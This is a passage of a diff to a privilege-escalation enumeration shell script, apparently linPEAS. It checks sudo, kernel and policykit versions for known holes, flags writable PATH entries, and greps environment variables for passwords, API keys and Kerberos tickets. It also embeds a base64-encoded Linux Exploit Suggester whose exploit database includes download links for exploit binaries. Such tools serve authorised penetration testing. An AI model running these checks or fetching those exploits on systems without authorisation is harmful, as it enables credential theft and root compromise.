"s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +warn_exec lsb_release -a 2>/dev/null +if [ "$MACPEAS" ]; then +warn_exec system_profiler SPSoftwareDataType +fi +echo "" + +#-- SY) Sudo +print_2title "Sudo version" +if [ "$(command -v sudo 2>/dev/null)" ]; then +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" +sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," +else echo_not_found "sudo" +fi +echo "" + +#--SY) USBCreator +print_2title "USBCreator" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" +if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then +pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") +if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) +fi +if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," fi - if [ -n "$pc_version" ]; then - pc_length=${#pc_version} - pc_major=$(echo "$pc_version" | cut -d. -f1) - pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," - fi - fi - fi - echo "" +fi +fi +echo "" - #-- SY) PATH - print_2title "PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" - echo "" +#-- SY) PATH +print_2title "PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" +echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" +echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" +echo "" - #-- SY) Date - print_2title "Date & uptime" - warn_exec date 2>/dev/null - warn_exec uptime 2>/dev/null - echo "" +#-- SY) Date +print_2title "Date & uptime" +warn_exec date 2>/dev/null +warn_exec uptime 2>/dev/null +echo "" - #-- SY) System stats - print_2title "System stats" - (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - warn_exec free 2>/dev/null - echo "" +#-- SY) System stats +print_2title "System stats" +(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" +warn_exec free 2>/dev/null +echo "" - #-- SY) CPU info - print_2title "CPU info" - warn_exec lscpu 2>/dev/null - echo "" +#-- SY) CPU info +print_2title "CPU info" +warn_exec lscpu 2>/dev/null +echo "" - #-- SY) Environment vars - print_2title "Environment" - print_info "Any private information inside environment variables?" - (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" - echo "" +#-- SY) Environment vars +print_2title "Environment" +print_info "Any private information inside environment variables?" +(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" +echo "" - #-- SY) Dmesg - print_2title "Searching Signature verification failed in dmseg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" - echo "" +#-- SY) Dmesg +print_2title "Searching Signature verification failed in dmseg" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" +(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" +echo "" - #-- SY) Kernel extensions - if [ "$MACPEAS" ]; then +#-- SY) Kernel extensions +if [ "$MACPEAS" ]; then print_2title "Kernel Extensions not belonging to apple" kextstat 2>/dev/null | grep -Ev " com.apple." print_2title "Unsigned Kernel Extensions" macosNotSigned /Library/Extensions macosNotSigned /System/Library/Extensions - fi +fi - if [ "$(command -v bash 2>/dev/null)" ]; then +if [ "$(command -v bash 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester" print_info "https://github.com/mzet-/linux-exploit-suggester" les_b64="IyEvYmluL2Jhc2gKCiMKIyBDb3B5cmlnaHQgKGMpIDIwMTYtMjAyMCwgQF9temV0XwojCiMgbGludXgtZXhwbG9pdC1zdWdnZXN0ZXIuc2ggY29tZXMgd2l0aCBBQlNPTFVURUxZIE5PIFdBUlJBTlRZLgojIFRoaXMgaXMgZnJlZSBzb2Z0d2FyZSwgYW5kIHlvdSBhcmUgd2VsY29tZSB0byByZWRpc3RyaWJ1dGUgaXQKIyB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlLiBTZWUgTElDRU5TRQojIGZpbGUgZm9yIHVzYWdlIG9mIHRoaXMgc29mdHdhcmUuCiMKClZFUlNJT049djEuMQoKIyBiYXNoIGNvbG9ycwojdHh0cmVkPSJcZVswOzMxbSIKdHh0cmVkPSJcZVs5MTsxbSIKdHh0Z3JuPSJcZVsxOzMybSIKdHh0Z3JheT0iXGVbMDszN20iCnR4dGJsdT0iXGVbMDszNm0iCnR4dHJzdD0iXGVbMG0iCmJsZHdodD0nXGVbMTszN20nCndodD0nXGVbMDszNm0nCmJsZGJsdT0nXGVbMTszNG0nCnllbGxvdz0nXGVbMTs5M20nCmxpZ2h0eWVsbG93PSdcZVswOzkzbScKCiMgaW5wdXQgZGF0YQpVTkFNRV9BPSIiCgojIHBhcnNlZCBkYXRhIGZvciBjdXJyZW50IE9TCktFUk5FTD0iIgpPUz0iIgpESVNUUk89IiIKQVJDSD0iIgpQS0dfTElTVD0iIgoKIyBrZXJuZWwgY29uZmlnCktDT05GSUc9IiIKCkNWRUxJU1RfRklMRT0iIgoKb3B0X2ZldGNoX2JpbnM9ZmFsc2UKb3B0X2ZldGNoX3NyY3M9ZmFsc2UKb3B0X2tlcm5lbF92ZXJzaW9uPWZhbHNlCm9wdF91bmFtZV9zdHJpbmc9ZmFsc2UKb3B0X3BrZ2xpc3RfZmlsZT1mYWxzZQpvcHRfY3ZlbGlzdF9maWxlPWZhbHNlCm9wdF9jaGVja3NlY19tb2RlPWZhbHNlCm9wdF9mdWxsPWZhbHNlCm9wdF9zdW1tYXJ5PWZhbHNlCm9wdF9rZXJuZWxfb25seT1mYWxzZQpvcHRfdXNlcnNwYWNlX29ubHk9ZmFsc2UKb3B0X3Nob3dfZG9zPWZhbHNlCm9wdF9za2lwX21vcmVfY2hlY2tzPWZhbHNlCm9wdF9za2lwX3BrZ192ZXJzaW9ucz1mYWxzZQoKQVJHUz0KU0hPUlRPUFRTPSJoVmZic3U6azpkcDpnIgpMT05HT1BUUz0iaGVscCx2ZXJzaW9uLGZ1bGwsZmV0Y2gtYmluYXJpZXMsZmV0Y2gtc291cmNlcyx1bmFtZTosa2VybmVsOixzaG93LWRvcyxwa2dsaXN0LWZpbGU6LHNob3J0LGtlcm5lbHNwYWNlLW9ubHksdXNlcnNwYWNlLW9ubHksc2tpcC1tb3JlLWNoZWNrcyxza2lwLXBrZy12ZXJzaW9ucyxjdmVsaXN0LWZpbGU6LGNoZWNrc2VjIgoKIyMgZXhwbG9pdHMgZGF0YWJhc2UKZGVjbGFyZSAtYSBFWFBMT0lUUwpkZWNsYXJlIC1hIEVYUExPSVRTX1VTRVJTUEFDRQoKIyMgdGVtcG9yYXJ5IGFycmF5IGZvciBwdXJwb3NlIG9mIHNvcnRpbmcgZXhwbG9pdHMgKGJhc2VkIG9uIGV4cGxvaXRzJyByYW5rKQpkZWNsYXJlIC1hIGV4cGxvaXRzX3RvX3NvcnQKZGVjbGFyZSAtYSBTT1JURURfRVhQTE9JVFMKCiMjIyMjIyMjIyMjIyBMSU5VWCBLRVJORUxTUEFDRSBFWFBMT0lUUyAjIyMjIyMjIyMjIyMjIyMjIyMjIwpuPTAKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBlbGZsYmwKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI9Mi40LjI5ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vaXNlYy5wbC92dWxuZXJhYmlsaXRpZXMvaXNlYy0wMDIxLXVzZWxpYi50eHQKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L2VsZmxibApleHBsb2l0LWRiOiA3NDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSB1c2VsaWIoKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj0yLjQuMjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9pc2VjLnBsL3Z1bG5lcmFiaWxpdGllcy9pc2VjLTAwMjEtdXNlbGliLnR4dApleHBsb2l0LWRiOiA3NzgKQ29tbWVudHM6IEtub3duIHRvIHdvcmsgb25seSBmb3IgMi40IHNlcmllcyAoZXZlbiB0aG91Z2ggMi42IGlzIGFsc28gdnVsbmVyYWJsZSkKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0xMjM1XSR7dHh0cnN0fSBrcmFkMwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjUsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAxMzk3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDQtMDA3N10ke3R4dHJzdH0gbXJlbWFwX3B0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDE2MApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHJhcHRvcl9wcmN0bApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEzLHZlcjw9Mi42LjE3ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMjAzMQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA2LTI0NTFdJHt0eHRyc3R9IHByY3RsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA1CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGw0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDExCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMzYyNl0ke3R4dHJzdH0gaDAwbHlzaGl0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuOCx2ZXI8PTIuNi4xNgpUYWdzOgpSYW5rOiAxCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDExMTEwMzA0MjkwNC9odHRwOi8vdGFyYW50dWxhLmJ5LnJ1L2xvY2Fscm9vdC8yLjYueC9oMDBseXNoaXQKZXhwbG9pdC1kYjogMjAxMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9IHZtc3BsaWNlMQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE3LHZlcjw9Mi42LjI0ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogNTA5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9IHZtc3BsaWNlMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIzLHZlcjw9Mi42LjI0ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogNTA5MwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTQyMTBdJHt0eHRyc3R9IGZ0cmV4ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTEsdmVyPD0yLjYuMjIKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA2ODUxCkNvbW1lbnRzOiB3b3JsZC13cml0YWJsZSBzZ2lkIGRpcmVjdG9yeSBhbmQgc2hlbGwgdGhhdCBkb2VzIG5vdCBkcm9wIHNnaWQgcHJpdnMgdXBvbiBleGVjIChhc2gvc2FzaCkgYXJlIHJlcXVpcmVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDgtNDIxMF0ke3R4dHJzdH0gZXhpdF9ub3RpZnkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yNSx2ZXI8PTIuNi4yOQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDgzNjkKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyXSR7dHh0cnN0fSBzb2NrX3NlbmRwYWdlIChzaW1wbGUgdmVyc2lvbikKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IHVidW50dT03LjEwLFJIRUw9NCxmZWRvcmE9NHw1fDZ8N3w4fDl8MTB8MTEKUmFuazogMQpleHBsb2l0LWRiOiA5NDc5CkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IHVidW50dT05LjA0ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3hvcmwud29yZHByZXNzLmNvbS8yMDA5LzA3LzE2L2N2ZS0yMDA5LTE4OTUtbGludXgta2VybmVsLXBlcl9jbGVhcl9vbl9zZXRpZC1wZXJzb25hbGl0eS1ieXBhc3MvCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9vZmZlbnNpdmUtc2VjdXJpdHkvZXhwbG9pdC1kYXRhYmFzZS1iaW4tc3Bsb2l0cy9yYXcvbWFzdGVyL2Jpbi1zcGxvaXRzLzk0MzUudGd6CmV4cGxvaXQtZGI6IDk0MzUKQ29tbWVudHM6IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIG5lZWRzIHRvIGVxdWFsIDAgT1IgcHVsc2VhdWRpbyBuZWVkcyB0byBiZSBpbnN0YWxsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiAKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NDM2LnRnegpleHBsb2l0LWRiOiA5NDM2CkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiAKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NjQxLnRhci5negpleHBsb2l0LWRiOiA5NjQxCkNvbW1lbnRzOiAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBuZWVkcyB0byBlcXVhbCAwIE9SIHB1bHNlYXVkaW8gbmVlZHMgdG8gYmUgaW5zdGFsbGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMjY5MixDVkUtMjAwOS0xODk1XSR7dHh0cnN0fSBzb2NrX3NlbmRwYWdlIChwcGMpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiB1YnVudHU9OC4xMCxSSEVMPTR8NQpSYW5rOiAxCmV4cGxvaXQtZGI6IDk1NDUKQ29tbWVudHM6IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIG5lZWRzIHRvIGVxdWFsIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjk4XSR7dHh0cnN0fSB0aGUgcmViZWwgKHVkcF9zZW5kbXNnKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkKVGFnczogZGViaWFuPTQKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NTc0LnRnegpleHBsb2l0LWRiOiA5NTc0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9ibG9nLmNyMC5vcmcvMjAwOS8wOC9jdmUtMjAwOS0yNjk4LXVkcHNlbmRtc2ctdnVsbmVyYWJpbGl0eS5odG1sCmF1dGhvcjogc3BlbmRlcgpDb21tZW50czogL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgbmVlZHMgdG8gZXF1YWwgMCBPUiBwdWxzZWF1ZGlvIG5lZWRzIHRvIGJlIGluc3RhbGxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IGhvYWdpZV91ZHBfc2VuZG1zZwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkseDg2ClRhZ3M6IGRlYmlhbj00ClJhbms6IDEKZXhwbG9pdC1kYjogOTU3NQphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbAphdXRob3I6IGFuZGkKQ29tbWVudHM6IFdvcmtzIGZvciBzeXN0ZW1zIHdpdGggL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgZXF1YWwgdG8gMApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IGthdG9uICh1ZHBfc2VuZG1zZykKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xLHZlcjw9Mi42LjE5LHg4NgpUYWdzOiBkZWJpYW49NApSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9LYWJvdC9Vbml4LVByaXZpbGVnZS1Fc2NhbGF0aW9uLUV4cGxvaXRzLVBhY2svcmF3L21hc3Rlci8yMDA5L0NWRS0yMDA5LTI2OTgva2F0b24uYwphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbAphdXRob3I6IFZ4SGVsbCBMYWJzCkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjk4XSR7dHh0cnN0fSBpcF9hcHBlbmRfZGF0YQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkseDg2ClRhZ3M6IGZlZG9yYT00fDV8NixSSEVMPTQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbApleHBsb2l0LWRiOiA5NTQyCmF1dGhvcjogcDBjNzNuMQpDb21tZW50czogV29ya3MgZm9yIHN5c3RlbXMgd2l0aCAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBlcXVhbCB0byAwCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMzU0N10ke3R4dHJzdH0gcGlwZS5jIDEKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMxClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMzMzMjEKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0zNTQ3XSR7dHh0cnN0fSBwaXBlLmMgMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAzMzMyMgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTM1NDddJHt0eHRyc3R9IHBpcGUuYyAzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDEwMDE4CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMzMwMV0ke3R4dHJzdH0gcHRyYWNlX2ttb2QyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMjYsdmVyPD0yLjYuMzQKVGFnczogZGViaWFuPTYuMHtrZXJuZWw6Mi42LigzMnwzM3wzNHwzNSktKDF8Mnx0cnVuayktYW1kNjR9LHVidW50dT0oMTAuMDR8MTAuMTApe2tlcm5lbDoyLjYuKDMyfDM1KS0oMTl8MjF8MjQpLXNlcnZlcn0KUmFuazogMQpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxMTExMDMwNDI5MDQvaHR0cDovL3RhcmFudHVsYS5ieS5ydS9sb2NhbHJvb3QvMi42Lngva21vZDIKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L3B0cmFjZS1rbW9kCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjY0MS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL3B0cmFjZV9rbW9kMi02NApleHBsb2l0LWRiOiAxNTAyMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTExNDZdJHt0eHRyc3R9IHJlaXNlcmZzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD0yLjYuMzQKVGFnczogdWJ1bnR1PTkuMTAKUmFuazogMQphbmFseXNpcy11cmw6I